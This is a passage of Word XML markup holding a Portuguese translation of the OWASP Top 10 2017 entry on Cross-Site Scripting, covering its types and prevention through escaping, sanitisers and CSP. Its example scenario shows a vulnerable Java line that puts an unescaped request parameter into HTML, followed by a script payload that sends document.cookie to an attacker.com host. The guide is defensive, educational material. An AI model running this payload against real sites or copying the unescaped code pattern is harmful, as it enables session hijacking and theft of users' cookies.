        <w:pStyle w:val="Default"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sim, se o código server-side usar input providenciado pelo Utilizador como parte do output do HTML e não se usarem caracteres de escape apropriados ao contexto em questão, para impedir que o script seja executado. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB2481" w:rsidRDefault="00DB2481" w:rsidP="00DB2481">
      <w:pPr>
        <w:pStyle w:val="Default"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Se uma página Web usar Javascript para adicionar código controlado por um ataque a uma página, estamos perante </w:t>
      </w:r>
      <w:r w:rsidR="00D74499">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D74499">
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting" \l "Client_XSS" </w:instrText>
      </w:r>
      <w:r w:rsidR="00D74499">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00D74499">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>XSS do lado Cliente</w:t>
      </w:r>
      <w:r w:rsidR="00D74499">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Idealmente, é de evitar o envio de código potencialmente controlável para </w:t>
      </w:r>
      <w:r w:rsidR="00D74499">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D74499">
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.owasp.org/images/c/c5/Unraveling_some_Mysteries_around_DOM-based_XSS.pdf" </w:instrText>
      </w:r>
      <w:r w:rsidR="00D74499">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00D74499">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>APIs Javascript que não sejam seguras</w:t>
      </w:r>
      <w:r w:rsidR="00D74499">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>, mas “</w:t>
      </w:r>
      <w:r w:rsidR="00B00D7E">
        <w:t xml:space="preserve">escapar” a validação do input pode ser uma ferramenta útil para tornar o processo seguro. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B00D7E" w:rsidRDefault="00B00D7E" w:rsidP="00DB2481">
      <w:pPr>
        <w:pStyle w:val="Default"/>
      </w:pPr>
      <w:r w:rsidRPr="00B00D7E">
        <w:t xml:space="preserve">Ferramentas automatizadas podem encontrar problemas de XSS automaticamente. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">No entanto, cada aplicação constrói as páginas de output de modo diferente e usa tipicamente interpretadores diferentes (Javascript, ActiveX, Flash e Silverlight), com bibliotecas “3rd party” em cima destas tecnologias. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B00D7E" w:rsidRDefault="00B00D7E" w:rsidP="00DB2481">
      <w:pPr>
        <w:pStyle w:val="Default"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esta diversidade torna a detecção automática complicada, particularmente quando se usam aplicações modernas só com uma página e frameworks / bibliotecas de Javascript poderosas. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B00D7E" w:rsidRPr="00B00D7E" w:rsidRDefault="00B00D7E" w:rsidP="00DB2481">
      <w:pPr>
        <w:pStyle w:val="Default"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Por isso, um processo completo de tornar as páginas mais seguras passa por uma combinação de rever o código manualmente, pentesting e aproximações automatizadas. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D74499" w:rsidRPr="00D74499" w:rsidRDefault="00D74499" w:rsidP="00D74499">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:r w:rsidRPr="00D74499">
        <w:t>Como prevenir um ataque de XSS</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p w:rsidR="00D74499" w:rsidRDefault="00D74499" w:rsidP="00DB2481">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D74499">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Prevenir um ataque XSS requer a separação entre os dados não confiáveis e o conteúdo activo do Browser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D74499" w:rsidRDefault="00D74499" w:rsidP="00D74499">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">para evitar ataques </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting" \l "Server_XSS" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00D74499">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>XSS do lado servidor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">, a melhor opção é utilizar correctamente os caracteres de escape dos dados não confiáveis, tendo em </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">conta o contexto HTML em que são inseridos (body, attribute, JavaScript, CSS ou URL). Verificar a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00D74499">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>OWASP XSS Prevention Cheat Sheet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> para detalhes sobre as técnicas de uso de caracteres de escape. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D74499" w:rsidRDefault="00D74499" w:rsidP="00D74499">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Para evitar ataques </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting" \l "Client_XSS" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00D74499">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>XSS do lado do Cliente</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>, a melhor opção é evitar passar dados para Javascript ou outras APIs que possam gerar conteúdo activo. Quando isto não poder ser evitado, técnicas semelhantes de uso de caracteres de escape podem ser usadas para ser aplicadas nas APIs do browser, tal com está descrito no OWASP DOM based XSS Prevention Cheat Sheet.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D74499" w:rsidRDefault="00D74499" w:rsidP="00D74499">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Para conteúdo complexo, considerar a auto-sanação das bibliotecas, usando o </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.owasp.org/index.php/Category:OWASP_AntiSamy_Project" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00D74499">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>OWASP AntiSamy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> ou o </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00D74499">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Java HTML Sanitizer Project</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D74499" w:rsidRPr="00D74499" w:rsidRDefault="00D74499" w:rsidP="00D74499">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Considerar a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://en.wikipedia.org/wiki/Content_Security_Policy" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00D74499">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Política de Segurança de Conteúdos (PSC ou CSP – Content Security Policy)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> para defender o site inteiro contra ataques. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB2481" w:rsidRPr="00D74499" w:rsidRDefault="00DB2481" w:rsidP="00DB2481">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pt-PT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D74499" w:rsidRPr="00D74499" w:rsidRDefault="00D74499" w:rsidP="00D74499">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="pt-PT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D74499">
        <w:rPr>
          <w:lang w:val="pt-PT"/>
        </w:rPr>
        <w:t>Cenário Exemplificativo de Ataque</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB2481" w:rsidRDefault="00D74499" w:rsidP="00DB2481">
      <w:pPr>
        <w:pStyle w:val="Default"/>
      </w:pPr>
      <w:r w:rsidRPr="00D74499">
        <w:t>A apllicaç</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ão usa dados não confiáveis na construção do seguinte HTML sem validação ou escaping correto: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D74499" w:rsidRDefault="00D74499" w:rsidP="00DB2481">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D74499" w:rsidRDefault="00DB2481" w:rsidP="00DB2481">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(String) page += "&lt;input name='</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>creditcard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">' type='TEXT' value='" + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>request.getParameter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">("CC") + "'&gt;"; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D74499" w:rsidRPr="00D74499" w:rsidRDefault="00D74499" w:rsidP="00DB2481">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="pt-PT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D74499">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="pt-PT"/>
        </w:rPr>
        <w:t xml:space="preserve">O atacante modifica o parâmetro CC do seu browser para algo como </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D74499" w:rsidRDefault="00DB2481" w:rsidP="00D74499">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'&gt;&lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>document.location</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>= 'http://www.attacker.com/cgi-bin/cookie.cgi? foo='+</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;/script&gt;'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D74499" w:rsidRPr="00D74499" w:rsidRDefault="00D74499" w:rsidP="00D74499">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="pt-PT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="pt-PT"/>
        </w:rPr>
        <w:t>Este ataque causa que o ID da</w:t>
      </w:r>
      <w:r w:rsidRPr="00D74499">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="pt-PT"/>
        </w:rPr>
        <w:t xml:space="preserve"> sess</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="pt-PT"/>
        </w:rPr>
        <w:t xml:space="preserve">ão da vítima seja enviado para o WebSite do atacante, permitindo que o atacante possa fazer hijack à sessão actual do utilizador. De notar que o atacante pode usar XSS para ultrapassar qualquer defesa CSRF automática que a aplicação possa ter. Verificar o ponto 2017-A8 para mais informação sobre o CSRF. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB2481" w:rsidRPr="00DB2481" w:rsidRDefault="00D74499" w:rsidP="00DB2481">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Referências</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DB2481" w:rsidRPr="00DB2481">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DB2481" w:rsidRPr="00DB2481">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB2481" w:rsidRPr="00DB2481" w:rsidRDefault="00DB2481" w:rsidP="00DB2481">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:spacing w:after="70"/>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB2481">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="00D74499">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>OWASP Types of Cross-Site Scripting</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DB2481">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB2481" w:rsidRPr="00DB2481" w:rsidRDefault="00DB2481" w:rsidP="00DB2481">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:spacing w:after="70"/>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB2481">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="00D74499">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>OWASP XSS Prevention Cheat Sheet</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DB2481">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB2481" w:rsidRPr="00DB2481" w:rsidRDefault="00DB2481" w:rsidP="00DB2481">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:spacing w:after="70"/>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB2481">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="00D74499">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>OWASP DOM based XSS Prevention Cheat Sheet</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DB2481">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB2481" w:rsidRPr="00DB2481" w:rsidRDefault="00DB2481" w:rsidP="00DB2481">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:spacing w:after="70"/>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
